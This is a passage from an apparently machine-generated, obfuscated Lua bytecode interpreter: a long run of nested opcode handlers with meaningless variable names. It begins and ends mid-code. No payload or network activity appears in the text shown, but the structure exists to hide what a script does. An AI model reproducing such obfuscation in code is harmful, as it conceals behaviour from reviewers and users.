end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][l[e[4]]];n=n+1;e=d[n];i=e[2];t={};a=0;s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;r={l[i](c(t,1,s-i))};A,s=r,#r;s=s+i-1;a=0;for e=i,s do a=a+1;l[e]=A[a];end;o=s;n=n+1;e=d[n];i=e[2];t={};a=0;s=o;for e=i+1,s do a=a+1;t[a]=l[e];end;r={l[i](c(t,1,s-i))};A,s=r,#r;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=A[a];end;o=s;elseif i>77 then local o=e[2];l[o]=l[o]-l[o+2];n=n+e[3];else local n;local d=e[2];local f={};local n=0;local t=d+e[3]-1;for e=d+1,t do n=n+1;f[n]=l[e];end;local f={l[d](c(f,1,t-d))};local t,f=f,#f;f=d+e[4]-2;n=0;for e=d,f do n=n+1;l[e]=t[n];end;o=f;end;elseif i<=84 then if i<=81 then if i<=79 then local n=e[2];if n>o then o=n end;l[n]={c({},1,e[3])};elseif i>80 then local n=e[2];if n>o then o=n end;l[n]=f[e[3]];else local n=e[2];if n>o then o=n end;l[n]=l[e[3]][l[e[4]]];end;elseif i<=82 then local n=e[2];if n>o then o=n end;l[n]=h()[f[e[3]]];elseif i>83 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]];else local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];local n;i=e[2];t={};local n=0;local d=i+e[3]-1;for e=i+1,d do n=n+1;t[n]=l[e];end;local d={l[i](c(t,1,d-i))};local f,d=d,#d;d=i+e[4]-2;n=0;for e=i,d do n=n+1;l[e]=f[n];end;o=d;end;elseif i<=87 then if i<=85 then local t=e[2];l[t]();o=t-1;n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>86 then local n;local n=e[2];local f={};local d=0;local e=n+e[3]-1;for e=n+1,e do d=d+1;f[d]=l[e];end;l[n](c(f,1,e-n));o=n-1;else local f=Q[e[3]];local t;if f[5]~=0 then local e={};t=Z({},{__index=function(l,n)local e=e[n];return e[1][e[2]];end,__newindex=function(o,l,n)local e=e[l]e[1][e[2]]=n;end;});for o=1,f[5]do n=n+1;local n=d[n];if n[1]==204 then e[o-1]={l,n[3]};else e[o-1]={K,n[3]};end;r[#r+1]=e;end;end;local e=e[2];if e>o then o=e end;l[e]=A(f,t,Env);end;elseif i<=88 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]][f[e[4]]];elseif i>89 then local n=e[2];if n>o then o=n end;l[n]=h()[f[e[3]]];else h()[f[e[3]]]=l[e[2]];end;elseif i<=135 then if i<=112 then if i<=101 then if i<=95 then if i<=92 then if i>91 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]][f[e[4]]];else n=n+e[3];end;elseif i<=93 then local n;local d=e[2];local f={};local n=0;local t=d+e[3]-1;for e=d+1,t do n=n+1;f[n]=l[e];end;local f={l[d](c(f,1,t-d))};local t,f=f,#f;f=d+e[4]-2;n=0;for e=d,f do n=n+1;l[e]=t[n];end;o=f;elseif i>94 then if(l[e[3]]==l[e[4]])then n=n+1;else n=n+d[n+1][3]+1;end;else do return end;end;elseif i<=98 then if i<=96 then local n=e[2];if n>o then o=n end;l[n]=h()[f[e[3]]];elseif i>97 then n=n+e[3];else local n=e[2];local d=l[e[3]];l[n+1]=d;l[n]=d[f[e[4]]];if n+1>o then o=n+1 end;end;elseif i<=99 then n=n+e[3];elseif i>100 then local n;local d=e[2];local t={};local n=0;local f=d+e[3]-1;for e=d+1,f do n=n+1;t[n]=l[e];end;local f={l[d](c(t,1,f-d))};local t,f=f,#f;f=d+e[4]-2;n=0;for e=d,f do n=n+1;l[e]=t[n];end;o=f;else local n;local d=e[2];local f={};local n=0;local t=d+e[3]-1;for e=d+1,t do n=n+1;f[n]=l[e];end;local f={l[d](c(f,1,t-d))};local t,f=f,#f;f=d+e[4]-2;n=0;for e=d,f do n=n+1;l[e]=t[n];end;o=f;end;elseif i<=106 then if i<=103 then if i>102 then n=n+e[3];else local n=e[2];if n>o then o=n end;l[n]=f[e[3]];end;elseif i<=104 then local n=e[2];if n>o then o=n end;l[n]=f[e[3]];elseif i>105 then local t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;else local o=e[2];local f=l[o+2];local d=l[o]+f;l[o]=d;if f>0 then if d<=l[o+1]then n=n+e[3];l[o+3]=d;end;elseif d>=l[o+1]then n=n+e[3];l[o+3]=d;end;end;elseif i<=109 then if i<=107 then local n=e[2];if n>o then o=n end;l[n]=h()[f[e[3]]];elseif i>108 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]][f[e[4]]];else local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local t={l[i](c(t,1,s-i))};local c,t=t,#t;t=i+e[4]-2;a=0;for e=i,t do a=a+1;l[e]=c[a];end;o=t;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];end;elseif i<=110 then if(f[e[3]]<l[e[4]])then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>111 then if(l[e[3]]<f[e[4]])then n=n+1;else n=n+d[n+1][3]+1;end;else local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=123 then if i<=117 then if i<=114 then if i>113 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]][f[e[4]]];else local n;local d=e[2];local t={};local n=0;local f=d+e[3]-1;for e=d+1,f do n=n+1;t[n]=l[e];end;local f={l[d](c(t,1,f-d))};local t,f=f,#f;f=d+e[4]-2;n=0;for e=d,f do n=n+1;l[e]=t[n];end;o=f;end;elseif i<=115 then local i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>116 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]][l[e[4]]];else local i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;l[i](c(t,1,s-i));o=i-1;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];t={};a=0;s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local h={l[i](c(t,1,s-i))};local s,f=h,#h;f=f+i-1;a=0;for e=i,f do a=a+1;l[e]=s[a];end;o=f;n=n+1;e=d[n];i=e[2];t={};a=0;f=o;for e=i+1,f do a=a+1;t[a]=l[e];end;h={l[i](c(t,1,f-i))};s,f=h,#h;f=i+e[4]-2;a=0;for e=i,f do a=a+1;l[e]=s[a];end;o=f;end;elseif i<=120 then if i<=118 then local n=e[2];local d=l[e[3]];l[n+1]=d;l[n]=d[f[e[4]]];if n+1>o then o=n+1 end;elseif i>119 then local n=e[2];local d=l[e[3]];l[n+1]=d;l[n]=d[f[e[4]]];if n+1>o then o=n+1 end;else local n=e[2];if n>o then o=n end;l[n]=f[e[3]];end;elseif i<=121 then n=n+e[3];elseif i>122 then local i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local t={l[i](c(t,1,s-i))};local c,t=t,#t;t=i+e[4]-2;a=0;for e=i,t do a=a+1;l[e]=c[a];end;o=t;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];else local n;local d=e[2];local t={};local n=0;local f=d+e[3]-1;for e=d+1,f do n=n+1;t[n]=l[e];end;local f={l[d](c(t,1,f-d))};local t,f=f,#f;f=d+e[4]-2;n=0;for e=d,f do n=n+1;l[e]=t[n];end;o=f;end;elseif i<=129 then if i<=126 then if i<=124 then h()[f[e[3]]]=l[e[2]];elseif i>125 then n=n+e[3];else local n;local d=e[2];local f={};local n=0;local e=d+e[3]-1;for e=d+1,e do n=n+1;f[n]=l[e];end;local e={l[d](c(f,1,e-d))};local f,e=e,#e;e=e+d-1;n=0;for e=d,e do n=n+1;l[e]=f[n];end;o=e;end;elseif i<=127 then local n=e[2];if n>o then o=n end;l[n]=h()[f[e[3]]];elseif i>128 then local i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local h;i=e[2];t={};local h=0;local a=i+e[3]-1;for e=i+1,a do h=h+1;t[h]=l[e];end;l[i](c(t,1,a-i));o=i-1;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];else local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local s=l[e[3]];l[i+1]=s;l[i]=s[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local r=i+e[3]-1;for e=i+1,r do a=a+1;t[a]=l[e];end;local t={l[i](c(t,1,r-i))};local c,t=t,#t;t=i+e[4]-2;a=0;for e=i,t do a=a+1;l[e]=c[a];end;o=t;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];s=l[e[3]];l[i+1]=s;l[i]=s[f[e[4]]];if i+1>o then o=i+1 end;end;elseif i<=132 then if i<=130 then local n=e[2];local d=l[e[3]];l[n+1]=d;l[n]=d[f[e[4]]];if n+1>o then o=n+1 end;elseif i>131 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]][f[e[4]]];else for e=e[2],e[3]do l[e]=nil;end;end;elseif i<=133 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>134 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][l[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local h;i=e[2];t={};local h=0;local a=i+e[3]-1;for e=i+1,a do h=h+1;t[h]=l[e];end;local t={l[i](c(t,1,a-i))};local c,t=t,#t;t=i+e[4]-2;h=0;for e=i,t do h=h+1;l[e]=c[h];end;o=t;n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];else local n=e[2];if n>o then o=n end;l[n]=l[e[3]][f[e[4]]];end;elseif i<=158 then if i<=146 then if i<=140 then if i<=137 then if i>136 then local n=e[2];if n>o then o=n end;l[n]=f[e[3]];else local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local t={l[i](c(t,1,s-i))};local c,t=t,#t;t=i+e[4]-2;a=0;for e=i,t do a=a+1;l[e]=c[a];end;o=t;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];end;elseif i<=138 then local i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local r={l[i](c(t,1,s-i))};local A,s=r,#r;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=A[a];end;o=s;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][l[e[4]]];n=n+1;e=d[n];i=e[2];t={};a=0;s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;r={l[i](c(t,1,s-i))};A,s=r,#r;s=s+i-1;a=0;for e=i,s do a=a+1;l[e]=A[a];end;o=s;n=n+1;e=d[n];i=e[2];t={};a=0;s=o;for e=i+1,s do a=a+1;t[a]=l[e];end;r={l[i](c(t,1,s-i))};A,s=r,#r;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=A[a];end;o=s;n=n+1;e=d[n];if(l[e[3]]==l[e[4]])then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>139 then local n=e[2];local d=l[e[3]];l[n+1]=d;l[n]=d[f[e[4]]];if n+1>o then o=n+1 end;else local n=e[2];if n>o then o=n end;l[n]=f[e[3]];end;elseif i<=143 then if i<=141 then local i=e[2];l[i]();o=i-1;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local a={l[i](c(t,1,h-i))};local s,h=a,#a;h=h+i-1;f=0;for e=i,h do f=f+1;l[e]=s[f];end;o=h;n=n+1;e=d[n];i=e[2];t={};f=0;h=o;for e=i+1,h do f=f+1;t[f]=l[e];end;a={l[i](c(t,1,h-i))};s,h=a,#a;h=i+e[4]-2;f=0;for e=i,h do f=f+1;l[e]=s[f];end;o=h;elseif i>142 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local t={l[i](c(t,1,s-i))};local c,t=t,#t;t=i+e[4]-2;a=0;for e=i,t do a=a+1;l[e]=c[a];end;o=t;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];else local n=e[2];if n>o then o=n end;l[n]=f[e[3]];end;elseif i<=144 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>145 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local t={l[i](c(t,1,s-i))};local c,t=t,#t;t=i+e[4]-2;a=0;for e=i,t do a=a+1;l[e]=c[a];end;o=t;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];h()[f[e[3]]]=l[e[2]];else local n=e[2];if n>o then o=n end;l[n]=l[e[3]][f[e[4]]];end;elseif i<=152 then if i<=149 then if i<=147 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]][l[e[4]]];elseif i>148 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;else local i=e[2];l[i]();o=i-1;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local r=l[e[3]];l[i+1]=r;l[i]=r[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local s={l[i](c(t,1,s-i))};local A,s=s,#s;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=A[a];end;o=s;n=n+1;e=d[n];i=e[2];r=l[e[3]];l[i+1]=r;l[i]=r[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];t={};a=0;s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;l[i](c(t,1,s-i));o=i-1;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=150 then local n;local n=e[2];local f={};local d=0;local e=n+e[3]-1;for e=n+1,e do d=d+1;f[d]=l[e];end;l[n](c(f,1,e-n));o=n-1;elseif i>151 then local i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local h;i=e[2];t={};local h=0;local a=i+e[3]-1;for e=i+1,a do h=h+1;t[h]=l[e];end;local t={l[i](c(t,1,a-i))};local c,t=t,#t;t=i+e[4]-2;h=0;for e=i,t do h=h+1;l[e]=c[h];end;o=t;n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];else local n;local n=e[2];local f={};local d=0;local e=n+e[3]-1;for e=n+1,e do d=d+1;f[d]=l[e];end;l[n](c(f,1,e-n));o=n-1;end;elseif i<=155 then if i<=153 then local n=e[2];if n>o then o=n end;l[n]=#l[e[3]];elseif i>154 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]][f[e[4]]];else if(l[e[3]]==f[e[4]])then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=156 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][l[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o 